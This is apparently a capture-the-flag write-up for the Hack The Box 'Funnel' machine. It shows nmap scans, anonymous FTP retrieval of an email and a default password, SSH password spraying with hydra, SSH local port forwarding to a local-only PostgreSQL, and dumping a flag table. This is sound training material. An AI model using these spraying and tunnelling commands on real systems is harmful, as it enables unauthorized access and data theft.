08.FUNNEL (PASSWORD SPRAYING & LOCAL PORT FORWARDING)

root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn

ENUMERATE SERVICES

root@htb:~$ sudo nmap -sV -T4 {targetIP} -p-
 PORT     STATE SERVICE       VERSION
 21/tcp open  ftp     vsftpd 3.0.3
 22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
 
 * Typically '-sV' is used with Nmap to determine versions, but that's not always enough. 
    - adding the -sC is another good way to determine service versions
       - the -sC option will run safe scripts which are designed to provide useful 
         information without being too intrusive or causing harm to the target systems.

VULNERABILITY SCANNING

root@htb:~$ nmap -sV -sC -T4 {targetIP} -p 21,22
 PORT   STATE SERVICE VERSION
 21/tcp open  ftp     vsftpd 3.0.3
 | ftp-syst: 
 |   STAT: 
 | FTP server status:
 |      Connected to ::ffff:10.10.14.215
 |      Logged in as ftp
 |      TYPE: ASCII
 |      No session bandwidth limit
 |      Session timeout in seconds is 300
 |      Control connection is plain text
 |      Data connections will be plain text
 |      At session startup, client count was 4
 |      vsFTPd 3.0.3 - secure, fast, stable
 |_End of status
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 |_drwxr-xr-x    2 ftp      ftp          4096 Nov 28  2022 mail_backup
 22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey: 
 |   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
 |   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
 |_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
 Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

 * the -SC runs the default set of Nmap scripts (NSE scripts), which typically include
   scripts for service enumeration, version detection, and other basic checks.
   
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 21,22
 PORT   STATE SERVICE
 21/tcp open  ftp
 22/tcp open  ssh

 * the --script=vuln will run scripts that focus specifically on detecting known 
   vulnerabilities in the service running on port 6379
    - e.g., weak configurations, or known vulnerabilities in the redis service
       - if no results are found then the service may be fully patched!

FOOTHOLD/COMPROMISE

Submit root flag
#
root@oco:~$ ftp {targetIP}
 220 (vsFTPd 3.0.3)
 Name ({targetIP}:{username}): {anonymous}
 230 Login successful.
 Remote system type is UNIX.
 Using binary mode to transfer files.

ftp> help
 cd     dir  ls   type
 chmod  exit pwd
 delete get  quit
 
ftp> dir
 drwxr-xr-x    2 ftp      ftp          4096 Nov 28  2022 mail_backup
 
ftp> cd mail_backup
 250 Directory successfully changed.

ftp> dir
 229 Entering Extended Passive Mode (|||52450|)
 150 Here comes the directory listing.
 -rw-r--r--    1 ftp      ftp         58899 Nov 28  2022 password_policy.pdf
 -rw-r--r--    1 ftp      ftp           713 Nov 28  2022 welcome_28112022
 226 Directory send OK.

ftp> get password_policy.pdf
 226 Transfer complete.
 
ftp> get welcome_28112022
 226 Transfer complete.
 
ftp> exit
 221 Goodbye.
root@oco:~$ cat welcome_28112022 
 From: [email protected]
 To: [email protected] [email protected] [email protected] [email protected] [email protected]
 Subject:Welcome to the team!
 ...
 
 * users in the "from" and "to" lines can be used for password spraying
 
root@oco:~$ open password_policy.pdf
 ...default password
 funnel123#!#
 ...
#PASSWORD SPRAYING
root@oco:~$ cat > usernames.txt
 optimus
 albert
 andreas
 christine
 maria
 root
 
 CTRL+C

root@oco:~$ hydra -L usernames.txt -p 'funnel123#!#' {target_IP} ssh 
 [DATA] attacking ssh://10.129.185.117:22/
 [22][ssh] host: 10.129.185.117   login: christine   password: funnel123#!#
 1 of 1 target successfully completed, 1 valid password found
#internal enumeration
root@oco:~$ ssh christine@{targetIP}
 funnel123#!#
 
root@oco:~$ id
 uid=1000(christine) gid=1000(christine) groups=1000(christine)
 
root@oco:~$ ss -tlpna
 State       Recv-Q   Send-Q   Local Address:Port     Peer Address:Port       Process                
 LISTEN      0        4096     127.0.0.53%lo:53       0.0.0.0:*
 LISTEN      0        128      0.0.0.0:22             0.0.0.0:*
 LISTEN      0        4096     127.0.0.1:5432         0.0.0.0:*
 LISTEN      0        4096     127.0.0.1:35437        0.0.0.0:*
 SYN-SENT    0        1        10.129.185.117:49946   8.8.8.8:53
 ESTAB       0        0        10.129.185.117:22      10.10.14.215:50268
 LISTEN      0        32       *:21                   *:*
 LISTEN      0        128      [::]:22                [::]:*
 
 * the "local address:port" displays the local address on which a service listens
    - addresses on 127.0.0.1 means that the specified port is only listening locally on the machine and cannot be accessed externally
    - addresses 0.0.0.0 , * , and [::] indicate that a port is listening on all intefaces
       - these are accessible externally, as well as locally
       
root@oco:~$ ss -tlpa
 State       Recv-Q   Send-Q   Local Address:Port         Peer Address:Port       Process
 LISTEN      0        4096     127.0.0.53%lo:domain       0.0.0.0:*
 LISTEN      0        128      0.0.0.0:ssh                0.0.0.0:*
 LISTEN      0        4096     127.0.0.1:postgresql       0.0.0.0:*
 LISTEN      0        4096     127.0.0.1:35437            0.0.0.0:*
 SYN-SENT    0        1        10.129.185.117:49946       8.8.8.8:53
 ESTAB       0        0        10.129.185.117:ssh         10.10.14.215:50268      //this indicates that the attacker is connected from 10.10.14.215 via port 50268
 LISTEN      0        32       *:ftp                      *:*
 LISTEN      0        128      [::]:ssh                   [::]:*
 
christine@funnel:~$ which psql
christine@funnel:~$ psql
 Command 'psql' not found, but can be installed with:
 apt install postgresql-client-common
 Please ask your administrator.
 
 * the postgresql DB can be accessed using the 'psql' utility (if installed on the host)
    - instead of uploading static binaries onto the target machine, an easier 
      way to bypass this roadblock is by a practice called port-forwarding, 
      or tunneling, using SSH
#
root@oco:~$ ssh [email protected] -L 31173:127.0.0.1:5432
 [email protected]'s password: funnel123#!#
 
 * the ssh client (attackerMachine) will establish a secure connection 
   to the remote SSH server (targetMachine). the ssh client (attackerMachine)
   will listen for incoming connections on the local port (attackerMachine)
   on port 31173.
    - when a client connects to the local port, the ssh client (attackingMachine)
      will forward the connection to the remote server (targetMachine) on port
      5432. this allows the local client (attackingMachine) to access services
      on the remote server (targetMachine) as if they were running on the 
      local machine.
      
christine@funnel:~$ ss -tlpna
 State     Recv-Q  Send-Q  Local Address:Port   Peer Address:Port    Process
 LISTEN    0       4096    127.0.0.53%lo:53     0.0.0.0:*             
 LISTEN    0       128     0.0.0.0:22           0.0.0.0:*           
 LISTEN    0       4096    127.0.0.1:5432       0.0.0.0:*            
 LISTEN    0       4096    127.0.0.1:38617      0.0.0.0:*            
 ESTAB     0       0       10.129.22.40:22      10.10.14.215:46754  
 SYN-SENT  0       1       10.129.22.40:42680   8.8.8.8:53           
 LISTEN    0       32      *:21                 *:*                  
 LISTEN    0       128     [::]:22              [::]:*
#
root@oco:~$ psql -U christine -h localhost -p 31173
 Password for user christine: 
 psql (15.8 (Debian 15.8-0+deb12u1), server 15.1 (Debian 15.1-1.pgdg110+1))
 Type "help" for help.

christine=# 

 * ensure to specify localhost using the -h option to target the tunnel
   created earlier with SSH, as well as port 31173 with the -p option, 
   which is the port the tunnel is listening on.
   
christine=# \list
                                                   List of databases
   Name    |   Owner   | Encoding |  Collate   |   Ctype    | ICU Locale | Locale Provider |    Access privileges    
 -----------+-----------+----------+------------+------------+------------+-----------------+-------------------------
 christine | christine | UTF8     | en_US.utf8 | en_US.utf8 |            | libc            | 
 postgres  | christine | UTF8     | en_US.utf8 | en_US.utf8 |            | libc            | 
 secrets   | christine | UTF8     | en_US.utf8 | en_US.utf8 |            | libc            | 
 template0 | christine | UTF8     | en_US.utf8 | en_US.utf8 |            | libc            | =c/christine           +
           |           |          |            |            |            |                 | christine=CTc/christine
 template1 | christine | UTF8     | en_US.utf8 | en_US.utf8 |            | libc            | =c/christine           +
           |           |          |            |            |            |                 | christine=CTc/christine
 (5 rows)

 * this list the existing DB
 
christine=# \connect secrets
 psql (15.8 (Debian 15.8-0+deb12u1), server 15.1 (Debian 15.1-1.pgdg110+1))
 You are now connected to database "secrets" as user "christine".

 * this connects to the specified DB
 
secrets=# \dt 
          List of relations
 Schema | Name | Type  |   Owner   
 --------+------+-------+-----------
 public | flag | table | christine
 (1 row)

 * list the database's tables
 
secrets=# select * from flag;
              value               
 ----------------------------------
 cf277664b1771217d7006acdea006db1
 (1 row)

Previous07.BIKE (SSTI)Next09.PENNYWORTH (GROOVY SCRIPTING & REVERSE SHELL)

Last updated